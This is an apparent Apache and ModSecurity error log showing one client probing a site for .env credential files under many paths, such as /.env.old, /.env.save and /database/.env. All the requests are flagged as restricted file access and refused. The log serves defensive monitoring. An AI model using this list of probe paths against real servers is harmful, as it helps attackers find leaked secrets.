[Sat Nov 29 05:39:33.630000 2025] [:error] [pid 400364] [client 3.96.137.215:60792] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSp5BYxM4Wj1FtUPgICrLwAAAAU"]
[Sat Nov 29 05:39:33.630248 2025] [:error] [pid 400364] [client 3.96.137.215:60792] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSp5BYxM4Wj1FtUPgICrLwAAAAU"]
[Sat Nov 29 05:39:33.630463 2025] [:error] [pid 400364] [client 3.96.137.215:60792] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSp5BYxM4Wj1FtUPgICrLwAAAAU"]
[Sat Nov 29 05:39:34.368077 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSp5BtzvgQgSrnIGPhRUdwAAAAo"]
[Sat Nov 29 05:39:34.368297 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSp5BtzvgQgSrnIGPhRUdwAAAAo"]
[Sat Nov 29 05:39:34.368480 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aSp5BtzvgQgSrnIGPhRUdwAAAAo"]
[Sat Nov 29 05:39:34.369817 2025] [:error] [pid 400366] [client 3.96.137.215:60956] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSp5BnWgHS3psMVK8zqUlwAAAAc"]
[Sat Nov 29 05:39:34.370074 2025] [:error] [pid 400366] [client 3.96.137.215:60956] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSp5BnWgHS3psMVK8zqUlwAAAAc"]
[Sat Nov 29 05:39:34.370260 2025] [:error] [pid 400366] [client 3.96.137.215:60956] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSp5BnWgHS3psMVK8zqUlwAAAAc"]
[Sat Nov 29 05:39:34.835420 2025] [authz_core:error] [pid 400367] [client 3.96.137.215:32926] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Sat Nov 29 05:39:35.409228 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSp5B_f8q--fJYmSMAuF9gAAAAk"]
[Sat Nov 29 05:39:35.409450 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSp5B_f8q--fJYmSMAuF9gAAAAk"]
[Sat Nov 29 05:39:35.409625 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSp5B_f8q--fJYmSMAuF9gAAAAk"]
[Sat Nov 29 05:39:35.662313 2025] [authz_core:error] [pid 400369] [client 3.96.137.215:33280] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Sat Nov 29 05:39:35.892988 2025] [:error] [pid 400368] [client 3.96.137.215:33430] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSp5Bx1BxAwBD2eT8veO1QAAAAs"]
[Sat Nov 29 05:39:35.893854 2025] [:error] [pid 400368] [client 3.96.137.215:33430] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSp5Bx1BxAwBD2eT8veO1QAAAAs"]
[Sat Nov 29 05:39:35.894062 2025] [:error] [pid 400368] [client 3.96.137.215:33430] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSp5Bx1BxAwBD2eT8veO1QAAAAs"]
[Sat Nov 29 05:39:36.128938 2025] [:error] [pid 400370] [client 3.96.137.215:33624] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSp5CJjgO8e606QOJFsQYQAAAA8"]
[Sat Nov 29 05:39:36.129203 2025] [:error] [pid 400370] [client 3.96.137.215:33624] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSp5CJjgO8e606QOJFsQYQAAAA8"]
[Sat Nov 29 05:39:36.129416 2025] [:error] [pid 400370] [client 3.96.137.215:33624] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSp5CJjgO8e606QOJFsQYQAAAA8"]
[Sat Nov 29 05:39:36.293992 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSp5CNzvgQgSrnIGPhRUeAAAAAo"]
[Sat Nov 29 05:39:36.294223 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSp5CNzvgQgSrnIGPhRUeAAAAAo"]
[Sat Nov 29 05:39:36.294429 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSp5CNzvgQgSrnIGPhRUeAAAAAo"]
[Sat Nov 29 05:39:36.896082 2025] [authz_core:error] [pid 398575] [client 3.96.137.215:60484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sat Nov 29 05:39:37.407787 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSp5CdzvgQgSrnIGPhRUeQAAAAo"]
[Sat Nov 29 05:39:37.408021 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSp5CdzvgQgSrnIGPhRUeQAAAAo"]
[Sat Nov 29 05:39:37.408236 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSp5CdzvgQgSrnIGPhRUeQAAAAo"]
[Sat Nov 29 05:39:37.792862 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSp5CQ31ShYAI8brU4C45AAAAAA"]
[Sat Nov 29 05:39:37.793113 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSp5CQ31ShYAI8brU4C45AAAAAA"]
[Sat Nov 29 05:39:37.793330 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSp5CQ31ShYAI8brU4C45AAAAAA"]
[Sat Nov 29 05:39:38.043567 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUegAAAAo"]
[Sat Nov 29 05:39:38.043791 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUegAAAAo"]
[Sat Nov 29 05:39:38.044011 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/psnlink/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUegAAAAo"]
[Sat Nov 29 05:39:38.400257 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSp5Cvf8q--fJYmSMAuF-AAAAAk"]
[Sat Nov 29 05:39:38.400580 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSp5Cvf8q--fJYmSMAuF-AAAAAk"]
[Sat Nov 29 05:39:38.400896 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSp5Cvf8q--fJYmSMAuF-AAAAAk"]
[Sat Nov 29 05:39:38.661874 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSp5Cg31ShYAI8brU4C45QAAAAA"]
[Sat Nov 29 05:39:38.662101 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSp5Cg31ShYAI8brU4C45QAAAAA"]
[Sat Nov 29 05:39:38.662296 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSp5Cg31ShYAI8brU4C45QAAAAA"]
[Sat Nov 29 05:39:38.952947 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUewAAAAo"]
[Sat Nov 29 05:39:38.953194 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUewAAAAo"]
[Sat Nov 29 05:39:38.953420 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/en/.env"] [unique_id "aSp5CtzvgQgSrnIGPhRUewAAAAo"]
[Sat Nov 29 05:39:39.509771 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSp5C_f8q--fJYmSMAuF-QAAAAk"]
